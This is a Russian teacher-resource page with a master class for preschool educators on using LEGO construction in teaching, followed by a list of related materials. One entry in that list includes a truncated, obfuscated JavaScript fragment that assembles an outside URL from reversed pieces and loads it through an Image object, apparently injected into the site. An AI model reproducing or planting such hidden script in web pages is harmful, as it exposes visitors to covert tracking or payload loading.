Мастер класс «Использование ЛЕГО - конструирования в образовательной работе с дошкольниками»
методическая разработка по конструированию, ручному труду на тему

Домова Светлана Вячеславовна

Мастер -класс

Скачать:

ВложениеРазмер
Файл master_-klass_lego_konstruirovanie.docx19.39 КБ

Предварительный просмотр:

Мастер класс «Использование ЛЕГО - конструирования в образовательной работе с дошкольниками»

Цель: повышение профессионального мастерства педагогов-участников мастер-класса в процессе активного педагогического общения по ЛЕГО-конструированию.

Задачи:

-обучение участников мастер-класса способам  применения ЛЕГО - конструктора;

-воссоздание технологий работы в области ЛЕГО-конструирования;

-формирование у участников мастер-класса мотивации к использованию в образовательной деятельности ЛЕГО-конструктора;

-популяризация инновационных технологий.

Оборудование и материалы: конструктор ЛЕГО.

Планируемый результат:

-активизация познавательной деятельности участников;

-информирование  о системе работы по лего-конструированию с детьми дошкольного возраста;

-практическое освоение педагогами конструктивными навыками в рамках транслируемого опыта.

                                                                «Конструируя,

                                                                ребенок действует, как зодчий,

                                                               возводящий здание собственного

                                                               потенциала»

                                                               Ж. Пиаже

В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых педагогических технологий, методик, различных видов дидактического материала. Наиболее популярным оборудованием на сегодняшний день считаются материалы Лего, в которые входят различные виды конструкторов.

Британская ассоциация торговцев игрушками присвоила конструктору звание «Игрушка столетия».

Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкновенное чудо: интерес к нему не затухает много десятилетий — с момента его появления в Дании в 1949 году.

С того дня и вплоть до настоящего времени Лего (LEGO) ни разу не изменил своему девизу «Играй с удовольствием».

У слова Лего два значения: «я учусь» и «я складываю.

 В педагогике Лего-технология интересна тем, что, строясь на интегрированных принципах, объединяет в себе элементы игры и экспериментирования.

Вопрос аудитории:

- Давайте дадим лучшему в мире конструктору небольшую характеристику.

Безопасность.

Широкие игровые возможности.

Польза. Развивает воображение, творческие способности, логическое мышление.

Подходит для любого сезона.

Универсальность. Подходит для всех возрастов: для девочек и мальчиков и даже взрослых.

Легкий сбор и разбор конструкций.

Это возможность коллективной игры.

Образовательные области в ДОУ не существуют в «чистом виде». Всегда происходит их интеграция, а с помощью применения Лего-конструирования легко можно интегрировать познавательное развитие, куда и входит техническое конструирование с художественно-эстетическим развитием, когда мы говорим о творческом конструировании, с социально – коммуникативным развитием, речевым и физическим. Посредством использования Лего-конструкторов можно эффективно решать образовательные задачи.

Я попытаюсь сегодня познакомить вас с некоторыми из вариантов применения лего - конструирования в различных образовательных областях.

Социально-коммуникативное развитие.

На мой взгляд, одна из основных целей в лего-конструировании – научить детей эффективно работать вместе, создавать совместные постройки, объединенные одной идеей, одним проектом. Сегодня, с введением ФГОС, совместное освоение знаний и развитие умений, интерактивный характер взаимодействия востребованы как никогда раньше.

Познавательное развитие

В процессе лего-конструирования у дошкольников развиваются математические способности и формируются сенсорные представления:

Происходит знакомство с такими пространственными показателями, как симметричность и асимметричность, ориентировка  в пространстве. Лего формирует пространственное мышление, развивает умение применять свои знания при проектировании и сборке конструкций, развивает логическое мышление.

Речевое развитие.

Тренируя пальцы, мы оказываем мощное воздействие на работоспособность коры головного мозга, а, следовательно, и на развитие речи. В процессе конструирования из Лего, дети общаются, договариваются, рассуждают, учатся отстаивать свою точку зрения, при этом расширяется словарный запас, умение задавать вопросы, развиваются диалогическая и монологическая речь.

 Можно применять  Лего и в процессе подготовки к обучению грамоте:

-предложить составить образ буквы из кирпичиков Лего;

-построить различные предметы, которые начинаются с указанного звука;

-выложить столько кирпичиков Лего на наборное полотно, сколько они слышат слов в данном предложении.

Художественно-эстетическое развитие

Лего - конструктор приходит на помощь при подготовке к детской театральной постановке. Сначала дети создают своих героев из конструктора, а затем озвучивают их. 

 Физическое развитие

Помимо мелкой моторики обеих рук Лего – конструирование также способствует развитию крупной моторики. Конструктор Лего можно использовать как инвентарь для проведения занятий по физической культуре.

Практическая часть 

Лего – умная игра,

Увлекательна, хитра!

Интересно здесь играть,

Строить, составлять, искать!

Приглашаю всех друзей

В Лего поиграть скорей!

Тут не только интересно!

В Лего поиграть полезно!

«Светофор».

Педагог раздаёт участникам  кирпичики трёх цветов и предлагает посоревноваться - кто больше составит различных светофоров, то есть требуется, чтобы кирпичики желтого, красного и зелёного цвета стояли в различном порядке. После выявления победителя педагог демонстрирует шесть комбинаций светофоров и объясняет систему, по которой надо было их составлять, чтобы не пропустить ни одного варианта.

«Придумай свою историю»

Разделиться на творческие группы. Предложить наборы конструктора, дать задание: несколько слов. Нужно придумать и построить с этими словами историю. Например: слова (забор, мост, качели; моделируют историю с этими словами). Например: «Жила-была девочка. Однажды она пошла, гулять, а дорога проходила через мост. Но девочке одной было скучно, и она пригласила друга. Вместе они отправились на детскую площадку. И т. д.).» У следующей группы может быть другая история.

Рефлексия

Задание «Выбери цвет конструктора Лего»

• Если всё понятно и интересно - красный кубик

• Если понятно, но не очень интересно - жёлтый.

• Если не понятно, не интересно - зелёный.

Заключение

Таким образом, можно сделать вывод: конструктор ЛЕГО является великолепным средством, помогающим обеспечить интеграцию различных видов деятельности и образовательных областей.  Кроме этого, Лего - конструирование - эффективное воспитательное средство, которое помогает объединить усилия педагогов и семьи в решении вопроса воспитания и развития ребенка. В совместной игре с родителями ребенок становится более усидчивым, работоспособным, целеустремленным, эмоционально отзывчивым.

Спасибо, уважаемые коллеги, за внимание и сотрудничество!


По теме: методические разработки, презентации и конспекты

мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста,  формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....

Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"

Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...

МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...

Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»

В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых пед...

МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками

Цель: повышение профессионального мастерства педагогов-участников мастер-классе по ЛЕГО-конструированию в процессе активного педагогического общения.Задачи:обучать участников мастер-класса навыкам при...

МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками

Добрый день, уважаемые гости. Сегодня на мастер-классе я хотела бы познакомить Лего-конструированием.   Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкнове...